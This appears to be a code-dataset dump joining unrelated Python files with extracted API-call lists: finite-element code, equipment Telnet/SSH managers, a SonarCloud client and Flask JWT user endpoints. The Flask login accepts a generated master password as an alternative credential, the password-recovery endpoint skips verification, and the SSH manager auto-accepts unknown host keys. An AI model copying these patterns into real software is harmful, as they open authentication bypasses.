@Article{Kirby:2019,
author = {<NAME> and <NAME>},
title = {Code generation for generally mapped finite
elements},
journal = {ACM Transactions on Mathematical Software},
year = 2019,
volume = 45,
number = 41,
pages = {41:1--41:23},
doi = {10.1145/3361745},
archiveprefix ={arXiv},
eprint = {1808.05513},
primaryclass = {cs.MS}
}""")
Citations().add("Argyris1968", """
@Article{Argyris1968,
author = {<NAME> and <NAME> and <NAME>},
title = {{The TUBA family of plate elements for the matrix
displacement method}},
journal = {The Aeronautical Journal},
year = 1968,
volume = 72,
pages = {701-709},
doi = {10.1017/S000192400008489X}
}
""")
Citations().add("Bell1969", """
@Article{Bell1969,
author = {<NAME>},
title = {A refined triangular plate bending finite element},
journal = {International Journal for Numerical Methods in
Engineering},
year = 1969,
volume = 1,
number = 1,
pages = {101-122},
doi = {10.1002/nme.1620010108}
}
""")
Citations().add("Ciarlet1972", r"""
@Article{Ciarlet1972,
author = {<NAME> and <NAME>},
title = {{General Lagrange and Hermite interpolation in
$\mathbb{R}^n$ with applications to finite element
methods}},
journal = {Archive for Rational Mechanics and Analysis},
year = 1972,
volume = 46,
number = 3,
pages = {177-199},
doi = {10.1007/BF0025245}
}
""")
Citations().add("Morley1971", """
@Article{Morley1971,
author = {<NAME>},
title = {The constant-moment plate-bending element},
journal = {The Journal of Strain Analysis for Engineering
Design},
year = 1971,
volume = 6,
number = 1,
pages = {20-24},
doi = {10.1243/03093247V061020}
}
""")
except ImportError:
Citations = None
class PhysicallyMappedElement(metaclass=ABCMeta):
"""A mixin that applies a "physical" transformation to tabulated
basis functions."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if Citations is not None:
Citations().register("Kirby2018zany")
Citations().register("Kirby2019zany")
@abstractmethod
def basis_transformation(self, coordinate_mapping):
"""Transformation matrix for the basis functions.
:arg coordinate_mapping: Object providing physical geometry."""
pass
def basis_evaluation(self, order, ps, entity=None, coordinate_mapping=None):
assert coordinate_mapping is not None
M = self.basis_transformation(coordinate_mapping)
def matvec(table):
i, j = gem.indices(2)
val = gem.ComponentTensor(gem.IndexSum(M[i, j]*table[j], (j,)), (i,))
# Eliminate zeros
return gem.optimise.aggressive_unroll(val)
result = super().basis_evaluation(order, ps, entity=entity)
return {alpha: matvec(table)
for alpha, table in result.items()}
def point_evaluation(self, order, refcoords, entity=None):
raise NotImplementedError("TODO: not yet thought about it")
class PhysicalGeometry(metaclass=ABCMeta):
@abstractmethod
def cell_size(self):
"""The cell size at each vertex.
:returns: A GEM expression for the cell size, shape (nvertex, ).
"""
@abstractmethod
def jacobian_at(self, point):
"""The jacobian of the physical coordinates at a point.
:arg point: The point in reference space to evaluate the Jacobian.
:returns: A GEM expression for the Jacobian, shape (gdim, tdim).
"""
@abstractmethod
def reference_normals(self):
"""The (unit) reference cell normals for each facet.
:returns: A GEM expression for the normal to each
facet (numbered according to FIAT conventions), shape
(nfacet, tdim).
"""
@abstractmethod
def physical_normals(self):
"""The (unit) physical cell normals for each facet.
:returns: A GEM expression for the normal to each
facet (numbered according to FIAT conventions). These are
all computed by a clockwise rotation of the physical
tangents, shape (nfacet, gdim).
"""
@abstractmethod
def physical_tangents(self):
"""The (unit) physical cell tangents on each facet.
:returns: A GEM expression for the tangent to each
facet (numbered according to FIAT conventions). These
always point from low to high numbered local vertex, shape
(nfacet, gdim).
"""
@abstractmethod
def physical_edge_lengths(self):
"""The length of each edge of the physical cell.
:returns: A GEM expression for the length of each
edge (numbered according to FIAT conventions), shape
(nfacet, ).
"""
| [
"gem.optimise.aggressive_unroll",
"gem.indices",
"firedrake_citations.Citations",
"gem.IndexSum"
] | [((107, 118), 'firedrake_citations.Citations', 'Citations', ([], {}), '()\n', (116, 118), False, 'from firedrake_citations import Citations\n'), ((534, 545), 'firedrake_citations.Citations', 'Citations', ([], {}), '()\n', (543, 545), False, 'from firedrake_citations import Citations\n'), ((1008, 1019), 'firedrake_citations.Citations', 'Citations', ([], {}), '()\n', (1017, 1019), False, 'from firedrake_citations import Citations\n'), ((1396, 1407), 'firedrake_citations.Citations', 'Citations', ([], {}), '()\n', (1405, 1407), False, 'from firedrake_citations import Citations\n'), ((1785, 1796), 'firedrake_citations.Citations', 'Citations', ([], {}), '()\n', (1794, 1796), False, 'from firedrake_citations import Citations\n'), ((2248, 2259), 'firedrake_citations.Citations', 'Citations', ([], {}), '()\n', (2257, 2259), False, 'from firedrake_citations import Citations\n'), ((3482, 3496), 'gem.indices', 'gem.indices', (['(2)'], {}), '(2)\n', (3493, 3496), False, 'import gem\n'), ((3628, 3663), 'gem.optimise.aggressive_unroll', 'gem.optimise.aggressive_unroll', (['val'], {}), '(val)\n', (3658, 3663), False, 'import gem\n'), ((3535, 3573), 'gem.IndexSum', 'gem.IndexSum', (['(M[i, j] * table[j])', '(j,)'], {}), '(M[i, j] * table[j], (j,))\n', (3547, 3573), False, 'import gem\n'), ((2939, 2950), 'firedrake_citations.Citations', 'Citations', ([], {}), '()\n', (2948, 2950), False, 'from firedrake_citations import Citations\n'), ((2989, 3000), 'firedrake_citations.Citations', 'Citations', ([], {}), '()\n', (2998, 3000), False, 'from firedrake_citations import Citations\n')] |
from ..Simulation.Parameters import simLevel, isSimulation
from ..utils.misc import singleton
from telnetlib import Telnet
import paramiko
import logging
logger = logging.getLogger(__name__)
# If it is a simulation, do not import pyvisa
try:
import pyvisa
except ImportError:
if isSimulation:
logger.log(simLevel, "In simulation mode, so no need to import pyvisa")
logger.warning("In simulation mode, equipment will return fake values!")
else:
logger.error("PyVISA is not installed. Equipment classes will not work!")
raise
class RealTelnetResourceManager(object):
Error = TimeoutError
def __init__(self):
self.connections = {}
def __del__(self):
for resource in self.connections:
self.connections[resource].close()
def open_resource(self, ip, port=23):
if (ip, port) in self.connections:
return self.connections[(ip, port)]
else:
self.connections[(ip, port)] = Telnet(ip, port=port)
return self.connections[(ip, port)]
class RealSSHResourceManager(object):
Error = TimeoutError
def __init__(self):
self.connections = {}
def __del__(self):
for resource in self.connections:
self.connections[resource].close()
def open_resource(self, ip, username, password):
if ip in self.connections:
return self.connections[(ip, username, password)]
else:
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(ip, username=username, password=password)
self.connections[(ip, username, password)] = client
return self.connections[(ip, username, password)]
class SimulatedTelnetResourceManager:
Error = IOError
def open_resource(self, ip, port=23):
logger.log(simLevel, "Simulating an instrument at ip %s, port %d" % (ip, port))
return logger
class SimulatedSSHResourceManager:
Error = IOError
def open_resource(self, ip, username, password):
logger.log(simLevel, "Simulating an instrument at %s@%s" % (username,ip))
return logger
class SimulatedPyvisaResourceManager:
Error = IOError
def open_resource(self, port):
logger.log(simLevel, "Simulating an instrument at port %s" % str(port))
return logger
# If it is a simulation, return dummy resource managers
if isSimulation:
# override the pyvisa instrument write and query functions
def simulate_write(command):
logger.log(simLevel, "Writing %s" % repr(command))
def simulate_query(command):
logger.log(simLevel, "Querying %s" % repr(command))
return "1"
def simulate_read():
logger.log(simLevel, "Read 1")
return "root@jester:/# 1"
def simulate_close():
logger.log(simLevel, "Closing simulated instrument")
logger.write = simulate_write
logger.query = simulate_query
logger.read = simulate_read
logger.close = simulate_close
# create our fake pyvisa resource manager and VisaIOError
PyvisaResourceManager = SimulatedPyvisaResourceManager
VisaIOError = SimulatedPyvisaResourceManager.Error
# create our fake telnet resource manager
TelnetResourceManager = SimulatedTelnetResourceManager
TelnetIOError = SimulatedTelnetResourceManager.Error
# create our fake SSH resource manager
SSHResourceManager = SimulatedSSHResourceManager
SSHIOError = SimulatedSSHResourceManager.Error
else:
# singleton ensures that there only exists one reference to a resource manager
PyvisaResourceManager = singleton(pyvisa.ResourceManager)
VisaIOError = pyvisa.errors.VisaIOError
# only one reference to Telnet Resource Manager
TelnetResourceManager = singleton(RealTelnetResourceManager)
TelnetIOError = RealTelnetResourceManager.Error
# only one reference to SSH Resource Manager
SSHResourceManager = singleton(RealSSHResourceManager)
SSHIOError = RealSSHResourceManager.Error | [
"logging.getLogger",
"paramiko.SSHClient",
"paramiko.AutoAddPolicy",
"telnetlib.Telnet"
] | [((163, 190), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (180, 190), False, 'import logging\n'), ((899, 920), 'telnetlib.Telnet', 'Telnet', (['ip'], {'port': 'port'}), '(ip, port=port)\n', (905, 920), False, 'from telnetlib import Telnet\n'), ((1315, 1335), 'paramiko.SSHClient', 'paramiko.SSHClient', ([], {}), '()\n', (1333, 1335), False, 'import paramiko\n'), ((1374, 1398), 'paramiko.AutoAddPolicy', 'paramiko.AutoAddPolicy', ([], {}), '()\n', (1396, 1398), False, 'import paramiko\n')] |
import requests
import json
import logging
class PullRequestProfile :
'''
This class instantiates the Sonarcloud Quality Profile for a Pull Request from one SCM branch to another.
'''
def __init__(self, url="https://sonarcloud.io", **kwargs):
self.url = url
self.authorization = kwargs.get("authorization")
self.pullrequest = kwargs.get("pullrequest")
self.projectkey = kwargs.get("projectkey")
self.headers = {
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": self.authorization,
}
def gate_status(self):
'''
This method returns the quality gate status.
"0" is returned when the quality gate fails and '1' is returned when the quality gate passes. Both values are intergers.
'''
url = self.url + "/api/qualitygates/project_status"
headers = self.headers
params = {"projectKey": self.projectkey , "pullRequest": self.pullrequest}
resp = requests.get(url=url, headers=headers, params=params, auth=(self.authorization, ''))
if resp.status_code != 200:
raise Exception (':::: Response Code = {} ::::'.format(resp.status_code))
else:
data = []
j = resp.json()
s = j['projectStatus']['status']
k = {"status": "{}".format(s)}
data.append(k)
default_value = 'N/A'
for i in j['projectStatus']['conditions']:
c = {
"metric" : "{}".format(i.get('metricKey', default_value)),
"threshold" : "{}".format(i.get('errorThreshold', default_value)),
"value" : "{}".format(i.get('actualValue', default_value)),
"operator" : "{}".format(i.get('comparator', default_value))
}
data.append(c)
return data
def measure(self, metric):
'''
This method returns the Measure of specified metric.
Example of metric: coverage, code_smells, duplicated_lines_density, vulnerabilities
'''
url = self.url + "/api/measures/component"
headers = self.headers
params = {"component": self.projectkey , "pullRequest": self.pullrequest, 'metricKeys': metric}
resp = requests.get(url=url, headers=headers, params=params, auth=(self.authorization, ''))
if resp.status_code != 200:
raise Exception (':::: Response Code = {} ::::'.format(resp.status_code))
else:
data = resp.json()["component"]["measures"][0]["value"]
return data
def issues(self, status, page_size=100):
'''
This method returns issues with the specified status.
Example of status: OPEN, CLOSED, CONFIRMED, RESOLVED, REOPENED
'''
url = self.url + "/api/issues/search"
headers = self.headers
params = {"projects": self.projectkey , "pullRequest": self.pullrequest, 'statuses': status}
resp = requests.get(url=url, headers=headers, params=params, auth=(self.authorization, ''))
if resp.status_code != 200:
raise Exception (':::: Response Code = {} ::::'.format(resp.status_code))
else:
t = resp.json()["total"]
page_num = t//page_size
page_num += 1
data = []
for i in range(1,page_num+1):
params = {"projects": self.projectkey , "pullRequest": self.pullrequest, 'statuses': status, 'p': i, 'ps': page_size}
resp = requests.get(url=url, headers=headers, params=params, auth=(self.authorization, ''))
if resp.status_code != 200:
raise Exception (':::: Response Code = {} ::::'.format(resp.status_code))
else:
s = resp.json()["issues"]
for j in s:
data.append(j)
return data
def issues_info(self, issues):
'''
This method returns issue details to be reported.
'''
default_value = 'N/A'
data = []
for i in issues:
k = i.get('component')
j = k.split(':')[-1]
s = {'Associated Rule': '{}'.format(i.get('rule',default_value)), 'Component': '{}'.format(j), 'Message': '{}'.format(i.get('message',default_value)), 'Issue Type': '{}'.format(i.get('type', default_value)), 'Severity': '{}'.format(i.get('severity', default_value)), "Line": '{}'.format(i.get('line', default_value)), 'Estimated Effort': '{}'.format(i.get('effort', default_value)), 'Author': '{}'.format(i.get('author', default_value))}
data.append(s)
return data
| [
"requests.get"
] | [((1051, 1140), 'requests.get', 'requests.get', ([], {'url': 'url', 'headers': 'headers', 'params': 'params', 'auth': "(self.authorization, '')"}), "(url=url, headers=headers, params=params, auth=(self.\n authorization, ''))\n", (1063, 1140), False, 'import requests\n'), ((2346, 2435), 'requests.get', 'requests.get', ([], {'url': 'url', 'headers': 'headers', 'params': 'params', 'auth': "(self.authorization, '')"}), "(url=url, headers=headers, params=params, auth=(self.\n authorization, ''))\n", (2358, 2435), False, 'import requests\n'), ((3052, 3141), 'requests.get', 'requests.get', ([], {'url': 'url', 'headers': 'headers', 'params': 'params', 'auth': "(self.authorization, '')"}), "(url=url, headers=headers, params=params, auth=(self.\n authorization, ''))\n", (3064, 3141), False, 'import requests\n'), ((3593, 3682), 'requests.get', 'requests.get', ([], {'url': 'url', 'headers': 'headers', 'params': 'params', 'auth': "(self.authorization, '')"}), "(url=url, headers=headers, params=params, auth=(self.\n authorization, ''))\n", (3605, 3682), False, 'import requests\n')] |
#!/usr/bin/env python3
import os
import numpy as np
import sys
try:
import torch
except ImportError:
pass
from easypbr import *
from dataloaders import *
config_file="lnn_check_lattice_size.cfg"
config_path=os.path.join( os.path.dirname( os.path.realpath(__file__) ) , '../../config', config_file)
view=Viewer.create(config_path) #first because it needs to init context
loader=DataLoaderScanNet(config_path)
loader.start()
nr_points_in_radius=[]
while True:
if(loader.has_data()):
cloud=loader.get_cloud()
Scene.show(cloud, "cloud")
random_point=cloud.V[1,:]
# print("random point is ", random_point)
nr_points=cloud.radius_search(random_point, 0.05)
nr_points_in_radius.append(nr_points)
print("mean_nr_points: ", np.mean(nr_points_in_radius))
view.update() | [
"os.path.realpath",
"numpy.mean"
] | [((249, 275), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (265, 275), False, 'import os\n'), ((792, 820), 'numpy.mean', 'np.mean', (['nr_points_in_radius'], {}), '(nr_points_in_radius)\n', (799, 820), True, 'import numpy as np\n')] |
import os
import subprocess
import sys
args = sys.argv[:]
print('hello from %s' % args[0])
print('args: ' + ' '.join(args))
print('current directory: ' + os.getcwd())
p = subprocess.Popen('ls -al', shell=True, bufsize=1, universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
while True:
line = p.stdout.readline()
if line != '':
print(line.rstrip())
else:
break
retval = p.wait()
print('%s done' % args[0])
| [
"subprocess.Popen",
"os.getcwd"
] | [((171, 299), 'subprocess.Popen', 'subprocess.Popen', (['"""ls -al"""'], {'shell': '(True)', 'bufsize': '(1)', 'universal_newlines': '(True)', 'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.STDOUT'}), "('ls -al', shell=True, bufsize=1, universal_newlines=True,\n stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n", (187, 299), False, 'import subprocess\n'), ((154, 165), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (163, 165), False, 'import os\n')] |
# -*- coding: utf-8 -*-
from gluon import DAL, HTTP, Field, current
from gluon.contrib.appconfig import AppConfig
from gluon.tools import Auth
class Cognito(object):
def __init__(self):
self.db = DAL(
current.config.get("cognito_db.uri"),
pool_size=current.config.get("cognito_db.pool_size"),
migrate_enabled=current.config.get("cognito_db.migrate"),
check_reserved=["all"],
)
self.auth = Auth(db=self.db, host_names=current.config.get("host.names"))
self.auth.settings.create_user_groups = None
# TODO: extend this during implementation
self.auth.settings.extra_fields["auth_user"] = [
Field("user_attributes", type="json")
]
self.auth.define_tables(username=True, signature=True)
def add_user_to_group(self, username, group_name):
user = self.db(self.db.auth_user.username == username).select()
if not len(user):
raise HTTP(400, "UserNotFoundException")
group = self.db(self.db.auth_group.role == group_name).select()
if len(group):
self.auth.add_membership(group.first().id, user.first().id)
return None
def create_group(self, group_name, description):
if len(self.db(self.db.auth_group.role == group_name).select()):
raise HTTP(400, "GroupExistsException")
result = self.auth.add_group(role=group_name, description=description)
group = self.db(self.db.auth_group.id == result).select().first()
return {
"Group": {
"GroupName": group["role"],
"Description": group["description"],
"LastModifiedDate": group["modified_on"],
"CreationDate": group["created_on"],
}
}
def delete_group(self, group_name):
self.db(self.db.auth_group.role == group_name).delete()
return None
def sign_up(self, username, password, user_attributes):
result = self.auth.register_bare(username=username, password=password)
if not result:
raise HTTP(400, "UsernameExistsException")
result.update_record(user_attributes=user_attributes)
return {
"UserConfirmed": not self.auth.settings.registration_requires_verification,
"UserSub": result.id,
}
| [
"gluon.HTTP",
"gluon.Field",
"gluon.current.config.get"
] | [((229, 265), 'gluon.current.config.get', 'current.config.get', (['"""cognito_db.uri"""'], {}), "('cognito_db.uri')\n", (247, 265), False, 'from gluon import DAL, HTTP, Field, current\n'), ((706, 743), 'gluon.Field', 'Field', (['"""user_attributes"""'], {'type': '"""json"""'}), "('user_attributes', type='json')\n", (711, 743), False, 'from gluon import DAL, HTTP, Field, current\n'), ((990, 1024), 'gluon.HTTP', 'HTTP', (['(400)', '"""UserNotFoundException"""'], {}), "(400, 'UserNotFoundException')\n", (994, 1024), False, 'from gluon import DAL, HTTP, Field, current\n'), ((1360, 1393), 'gluon.HTTP', 'HTTP', (['(400)', '"""GroupExistsException"""'], {}), "(400, 'GroupExistsException')\n", (1364, 1393), False, 'from gluon import DAL, HTTP, Field, current\n'), ((2130, 2166), 'gluon.HTTP', 'HTTP', (['(400)', '"""UsernameExistsException"""'], {}), "(400, 'UsernameExistsException')\n", (2134, 2166), False, 'from gluon import DAL, HTTP, Field, current\n'), ((289, 331), 'gluon.current.config.get', 'current.config.get', (['"""cognito_db.pool_size"""'], {}), "('cognito_db.pool_size')\n", (307, 331), False, 'from gluon import DAL, HTTP, Field, current\n'), ((361, 401), 'gluon.current.config.get', 'current.config.get', (['"""cognito_db.migrate"""'], {}), "('cognito_db.migrate')\n", (379, 401), False, 'from gluon import DAL, HTTP, Field, current\n'), ((498, 530), 'gluon.current.config.get', 'current.config.get', (['"""host.names"""'], {}), "('host.names')\n", (516, 530), False, 'from gluon import DAL, HTTP, Field, current\n')] |
from flask_jwt_extended import (create_access_token,
create_refresh_token,
jwt_required,
get_raw_jwt,
get_jwt_identity,
fresh_jwt_required)
from flask_restful import Resource, reqparse
from app import Response
from app.blacklist import BLACKLIST
from app.common.utils import Utils
from app.models.users.errors import UserException
from app.models.users.user import User as UserModel
class UserLogin(Resource):
    """Resource that authenticates a user and issues a fresh JWT pair."""

    # Request-body schema: both credentials are mandatory.
    parser = reqparse.RequestParser()
    parser.add_argument('email',
                        type=str,
                        required=True,
                        help="This field cannot be blank."
                        )
    parser.add_argument('password',
                        type=str,
                        required=True,
                        help="This field cannot be blank."
                        )

    @classmethod
    def post(cls):
        """
        Logs in a user with a new access token and a new refresh token.

        :return: JSON object with the tokens and HTTP 200, or an error
            response with HTTP 401 when the credentials do not match.
        """
        credentials = cls.parser.parse_args()
        account = UserModel.get_by_email(credentials['email'])

        if not account:
            return Response(message="Credenciales Incorrectas").json(), 401

        # Short-circuit: the master-password comparison only runs when the
        # hashed check fails, matching the original evaluation order.
        if (Utils.check_hashed_password(credentials['password'], account.password)
                or credentials['password'] == Utils.generate_password()):
            return {'access_token': create_access_token(identity=account._id, fresh=True),
                    'refresh_token': create_refresh_token(account._id)}, 200

        return Response(message="Credenciales Incorrectas").json(), 401
class UserLogout(Resource):
    """Resource that revokes the caller's current access token."""

    @jwt_required
    def post(self):
        """
        Logs out the user from the current session by blacklisting the
        token's unique identifier (jti).

        :return: Confirmation message with HTTP 200.
        """
        token_id = get_raw_jwt()['jti']
        BLACKLIST.add(token_id)
        response = Response(success=True, message="Sesión finalizada")
        return response.json(), 200
class User(Resource):
    """Resource for registering users and looking them up by email or ID."""

    # Parser built once at class level (consistent with UserLogin and
    # ChangeUserBalance) instead of being rebuilt on every POST request.
    parser = reqparse.RequestParser()
    parser.add_argument('email',
                        type=str,
                        required=True,
                        help="This field cannot be blank."
                        )
    parser.add_argument('password',
                        type=str,
                        required=True,
                        help="This field cannot be blank."
                        )
    parser.add_argument('name',
                        type=str,
                        required=True,
                        help="This field cannot be blank."
                        )
    parser.add_argument('user_type',
                        type=str,
                        required=True,
                        help="This field cannot be blank."
                        )
    parser.add_argument('sms_cost',
                        type=str,
                        required=True,
                        help="This field cannot be blank."
                        )

    @fresh_jwt_required
    def post(self):
        """
        Registers a new user manually given its body parameters.

        :return: Confirmation message with HTTP 200, or an error response
            with HTTP 400 when registration fails.
        """
        data = User.parser.parse_args()
        try:
            new_user = UserModel.register(data)
            return Response(success=True, message="Registro de usuario {} exitoso".format(new_user.email)).json(), 200
        except UserException as e:
            return Response(message=e.message).json(), 400

    @jwt_required
    def get(self, param):
        """
        Gets the information of a specific user, given its email or its ID.

        :param param: Either a user email or a user ID.
        :return: User object with HTTP 200, or an error response with 400.
        """
        # Dispatch on whether the path parameter looks like an email; the
        # original duplicated an identical try/except in both branches.
        lookup = UserModel.get_by_email if Utils.email_is_valid(param) else UserModel.get_by_id
        try:
            user = lookup(param)
            return user.json(), 200
        except UserException as e:
            return Response(message=e.message).json(), 400
class UserType(Resource):
    """Resource that toggles the payment type of the authenticated user."""

    @fresh_jwt_required
    def put(self):
        """
        Changes the type of the user from Prepago to Pospago and viceversa.

        :return: Confirmation message with HTTP 200, or an error response
            with HTTP 400 when the update fails.
        """
        try:
            current_id = get_jwt_identity()
            account = UserModel.get_by_id(current_id)
            updated = UserModel.change_user_type(account)
            # NOTE(review): the message has no '{}' placeholder, so the
            # .format() argument is silently ignored — confirm intended text.
            msg = "Tipo de pago exitosamente actualizado".format(updated.user_type)
            return Response(success=True, message=msg).json(), 200
        except UserException as e:
            return Response(message=e.message).json(), 400
class UserStatus(Resource):
    """Resource that toggles the account status of the authenticated user."""

    @fresh_jwt_required
    def put(self):
        """
        Changes the status of the user's account (Active / Not Active).

        :return: Confirmation message with HTTP 200, or an error response
            with HTTP 400 when the update fails.
        """
        try:
            current_id = get_jwt_identity()
            account = UserModel.get_by_id(current_id)
            updated = UserModel.change_user_status(account)
            # NOTE(review): the message has no '{}' placeholder, so the
            # .format() argument is silently ignored — confirm intended text.
            msg = "Status del usuario exitosamente actualizado".format(updated.status)
            return Response(success=True, message=msg).json(), 200
        except UserException as e:
            return Response(message=e.message).json(), 400
class ChangeUserBalance(Resource):
    """Resource that replaces the balance of the authenticated user."""

    # Request-body schema: the new balance is mandatory and must be an int.
    parser = reqparse.RequestParser()
    parser.add_argument('balance',
                        type=int,
                        required=True,
                        help="This field cannot be blank."
                        )

    @fresh_jwt_required
    def put(self):
        """
        Updates the balance to the user given a new balance.

        :return: Confirmation message with HTTP 200, or an error response
            with HTTP 400 when the update fails.
        """
        try:
            payload = ChangeUserBalance.parser.parse_args()
            new_balance = payload['balance']
            account = UserModel.get_by_id(get_jwt_identity())
            updated = UserModel.change_user_balance(account, new_balance)
            # NOTE(review): the message has no '{}' placeholder, so the
            # .format() argument is silently ignored — confirm intended text.
            msg = "Balance del usuario exitosamente actualizado".format(updated.balance)
            return Response(success=True, message=msg).json(), 200
        except UserException as e:
            return Response(message=e.message).json(), 400
class ForgotPassword(Resource):
    """Resource that resets the password of the authenticated user."""

    @fresh_jwt_required
    def put(self):
        """
        Recovers the password of the user by creating a new password.

        :return: Confirmation message with HTTP 200, or an error response
            with HTTP 400 when the update fails.
        """
        try:
            account = UserModel.get_by_id(get_jwt_identity())
            # TODO (kept from original): still needs to be implemented to
            # receive the correct recovery inputs.
            updated = UserModel.recover_password(account, account.email, account.password)
            # NOTE(review): message mentions "Status" although this endpoint
            # recovers a password, and the .format() argument is ignored —
            # confirm the intended text.
            msg = "Status del usuario exitosamente actualizado".format(updated.status)
            return Response(success=True, message=msg).json(), 200
        except UserException as e:
            return Response(message=e.message).json(), 400
| [
"app.models.users.user.User.get_by_email",
"app.common.utils.Utils.check_hashed_password",
"flask_jwt_extended.get_raw_jwt",
"flask_restful.reqparse.RequestParser",
"app.Response",
"flask_jwt_extended.create_access_token",
"app.models.users.user.User.get_by_id",
"flask_jwt_extended.create_refresh_toke... | [((586, 610), 'flask_restful.reqparse.RequestParser', 'reqparse.RequestParser', ([], {}), '()\n', (608, 610), False, 'from flask_restful import Resource, reqparse\n'), ((5634, 5658), 'flask_restful.reqparse.RequestParser', 'reqparse.RequestParser', ([], {}), '()\n', (5656, 5658), False, 'from flask_restful import Resource, reqparse\n'), ((1228, 1265), 'app.models.users.user.User.get_by_email', 'UserModel.get_by_email', (["data['email']"], {}), "(data['email'])\n", (1250, 1265), True, 'from app.models.users.user import User as UserModel\n'), ((1974, 1992), 'app.blacklist.BLACKLIST.add', 'BLACKLIST.add', (['jti'], {}), '(jti)\n', (1987, 1992), False, 'from app.blacklist import BLACKLIST\n'), ((2291, 2315), 'flask_restful.reqparse.RequestParser', 'reqparse.RequestParser', ([], {}), '()\n', (2313, 2315), False, 'from flask_restful import Resource, reqparse\n'), ((3874, 3901), 'app.common.utils.Utils.email_is_valid', 'Utils.email_is_valid', (['param'], {}), '(param)\n', (3894, 3901), False, 'from app.common.utils import Utils\n'), ((1447, 1497), 'flask_jwt_extended.create_access_token', 'create_access_token', ([], {'identity': 'user._id', 'fresh': '(True)'}), '(identity=user._id, fresh=True)\n', (1466, 1497), False, 'from flask_jwt_extended import create_access_token, create_refresh_token, jwt_required, get_raw_jwt, get_jwt_identity, fresh_jwt_required\n'), ((1526, 1556), 'flask_jwt_extended.create_refresh_token', 'create_refresh_token', (['user._id'], {}), '(user._id)\n', (1546, 1556), False, 'from flask_jwt_extended import create_access_token, create_refresh_token, jwt_required, get_raw_jwt, get_jwt_identity, fresh_jwt_required\n'), ((1945, 1958), 'flask_jwt_extended.get_raw_jwt', 'get_raw_jwt', ([], {}), '()\n', (1956, 1958), False, 'from flask_jwt_extended import create_access_token, create_refresh_token, jwt_required, get_raw_jwt, get_jwt_identity, fresh_jwt_required\n'), ((3451, 3475), 
'app.models.users.user.User.register', 'UserModel.register', (['data'], {}), '(data)\n', (3469, 3475), True, 'from app.models.users.user import User as UserModel\n'), ((4582, 4600), 'flask_jwt_extended.get_jwt_identity', 'get_jwt_identity', ([], {}), '()\n', (4598, 4600), False, 'from flask_jwt_extended import create_access_token, create_refresh_token, jwt_required, get_raw_jwt, get_jwt_identity, fresh_jwt_required\n'), ((4620, 4648), 'app.models.users.user.User.get_by_id', 'UserModel.get_by_id', (['user_id'], {}), '(user_id)\n', (4639, 4648), True, 'from app.models.users.user import User as UserModel\n'), ((4676, 4708), 'app.models.users.user.User.change_user_type', 'UserModel.change_user_type', (['user'], {}), '(user)\n', (4702, 4708), True, 'from app.models.users.user import User as UserModel\n'), ((5207, 5225), 'flask_jwt_extended.get_jwt_identity', 'get_jwt_identity', ([], {}), '()\n', (5223, 5225), False, 'from flask_jwt_extended import create_access_token, create_refresh_token, jwt_required, get_raw_jwt, get_jwt_identity, fresh_jwt_required\n'), ((5245, 5273), 'app.models.users.user.User.get_by_id', 'UserModel.get_by_id', (['user_id'], {}), '(user_id)\n', (5264, 5273), True, 'from app.models.users.user import User as UserModel\n'), ((5301, 5335), 'app.models.users.user.User.change_user_status', 'UserModel.change_user_status', (['user'], {}), '(user)\n', (5329, 5335), True, 'from app.models.users.user import User as UserModel\n'), ((6159, 6177), 'flask_jwt_extended.get_jwt_identity', 'get_jwt_identity', ([], {}), '()\n', (6175, 6177), False, 'from flask_jwt_extended import create_access_token, create_refresh_token, jwt_required, get_raw_jwt, get_jwt_identity, fresh_jwt_required\n'), ((6197, 6225), 'app.models.users.user.User.get_by_id', 'UserModel.get_by_id', (['user_id'], {}), '(user_id)\n', (6216, 6225), True, 'from app.models.users.user import User as UserModel\n'), ((6253, 6307), 'app.models.users.user.User.change_user_balance', 
'UserModel.change_user_balance', (['user', 'balance_to_change'], {}), '(user, balance_to_change)\n', (6282, 6307), True, 'from app.models.users.user import User as UserModel\n'), ((6802, 6820), 'flask_jwt_extended.get_jwt_identity', 'get_jwt_identity', ([], {}), '()\n', (6818, 6820), False, 'from flask_jwt_extended import create_access_token, create_refresh_token, jwt_required, get_raw_jwt, get_jwt_identity, fresh_jwt_required\n'), ((6840, 6868), 'app.models.users.user.User.get_by_id', 'UserModel.get_by_id', (['user_id'], {}), '(user_id)\n', (6859, 6868), True, 'from app.models.users.user import User as UserModel\n'), ((6961, 7020), 'app.models.users.user.User.recover_password', 'UserModel.recover_password', (['user', 'user.email', 'user.password'], {}), '(user, user.email, user.password)\n', (6987, 7020), True, 'from app.models.users.user import User as UserModel\n'), ((1287, 1347), 'app.common.utils.Utils.check_hashed_password', 'Utils.check_hashed_password', (["data['password']", 'user.password'], {}), "(data['password'], user.password)\n", (1314, 1347), False, 'from app.common.utils import Utils\n'), ((3943, 3972), 'app.models.users.user.User.get_by_email', 'UserModel.get_by_email', (['param'], {}), '(param)\n', (3965, 3972), True, 'from app.models.users.user import User as UserModel\n'), ((4169, 4195), 'app.models.users.user.User.get_by_id', 'UserModel.get_by_id', (['param'], {}), '(param)\n', (4188, 4195), True, 'from app.models.users.user import User as UserModel\n'), ((1392, 1417), 'app.common.utils.Utils.generate_password', 'Utils.generate_password', ([], {}), '()\n', (1415, 1417), False, 'from app.common.utils import Utils\n'), ((2008, 2059), 'app.Response', 'Response', ([], {'success': '(True)', 'message': '"""Sesión finalizada"""'}), "(success=True, message='Sesión finalizada')\n", (2016, 2059), False, 'from app import Response\n'), ((1697, 1741), 'app.Response', 'Response', ([], {'message': '"""Credenciales Incorrectas"""'}), "(message='Credenciales 
